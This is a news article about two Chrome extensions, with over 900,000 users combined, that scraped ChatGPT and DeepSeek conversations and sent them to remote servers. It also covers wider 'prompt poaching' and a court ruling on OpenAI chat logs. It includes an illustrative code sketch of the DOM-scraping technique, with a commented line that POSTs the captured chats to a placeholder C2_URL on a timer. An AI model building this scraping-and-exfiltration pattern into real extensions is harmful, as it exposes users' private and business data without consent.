Malicious browser extensions are harvesting ChatGPT conversations at massive scale

January 8, 2026. Security researchers have uncovered a widespread surveillance campaign targeting ChatGPT users, raising fresh concerns about how much personal and professional information people are unknowingly exposing through AI tools.

According to new findings from cybersecurity firms OX Security and Secure Annex, two popular Chrome browser extensions with a combined user base of more than 900,000 have been found secretly collecting ChatGPT and DeepSeek conversations and transmitting them to remote servers controlled by unknown actors. 

The extensions, “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” and “AI Sidebar with Deepseek, ChatGPT, Claude, and more,” masqueraded as productivity tools while quietly exfiltrating full chatbot conversations alongside browsing data at regular 30-minute intervals. According to OX Security, the add-ons extracted chat messages directly from web pages using DOM scraping, then stored and transmitted them to remote command-and-control servers.
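To illustrate why this technique works, here is a minimal, hypothetical sketch of the DOM-scraping pattern the researchers describe: a content script reads whatever chat text is rendered on the page and batches it for periodic upload. The selectors, field names, and timing shown here are assumptions for illustration, not the actual extensions' code.

```typescript
// Hypothetical sketch, assuming a chat UI whose messages are readable
// from the rendered page. A real content script would obtain these
// nodes via something like document.querySelectorAll(...); here a
// plain array stands in for the DOM.
interface MessageNode {
  role: string;        // e.g. "user" or "assistant"
  textContent: string; // visible message text
}

// Collect every rendered message as "role: text".
function scrapeConversation(nodes: MessageNode[]): string[] {
  return nodes.map((n) => `${n.role}: ${n.textContent.trim()}`);
}

// Package the scraped messages for upload. A real extension would
// POST this on a timer to a command-and-control server, e.g.
//   setInterval(() => fetch(C2_URL, { method: "POST", body }), 30 * 60 * 1000)
function buildPayload(messages: string[]): string {
  return JSON.stringify({
    capturedAt: new Date().toISOString(),
    messages,
  });
}

// Anything typed into the chat, sensitive or not, ends up in the batch.
const fakeDom: MessageNode[] = [
  { role: "user", textContent: " Draft our Q3 pricing strategy " },
  { role: "assistant", textContent: "Here is a draft plan..." },
];
const payload = buildPayload(scrapeConversation(fakeDom));
```

The point of the sketch is that nothing here requires breaking encryption or OpenAI's API: once an extension has permission to run on the page, the conversation is just text in the DOM, readable by design.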

The danger goes far beyond casual chats. Researchers say exfiltrated data can include corporate prompts, internal URLs, proprietary code, business strategies and personal information shared with AI tools. 

“This data can be weaponized for corporate espionage, identity theft, targeted phishing campaigns, or sold on underground forums,” OX Security warned, noting that employees who installed the extensions may have inadvertently exposed intellectual property, internal systems and customer data.

The campaign is part of a broader trend researchers have dubbed “prompt poaching,” the practice of covertly collecting AI prompts and responses through browser extensions. Secure Annex says the technique has already appeared in other extensions, including Urban VPN Proxy, which previously had millions of installations.

Prompt poaching is no longer limited to outright malicious software. Secure Annex also found that legitimate extensions, such as Similarweb and Sensor Tower’s Stayfocusd, collect AI conversations under updated terms of service. A January 2026 update to those terms explicitly states that data entered into AI tools, including prompts, uploaded files and outputs, may be collected for analytics.

The findings land amid mounting legal pressure on OpenAI itself. This week, a US federal judge upheld an initial ruling that ordered the company to turn over 20 million de-identified ChatGPT conversation logs to news organizations pursuing copyright claims. In his ruling, the judge rejected claims that user privacy would be unduly burdened. Although OpenAI maintains that the shared data will be anonymized and restricted, privacy concerns persist, given that many users never expected their AI conversations, including deleted ones, to turn up as discovery material.




Jim Love

Jim is an author and podcast host with over 40 years in technology.
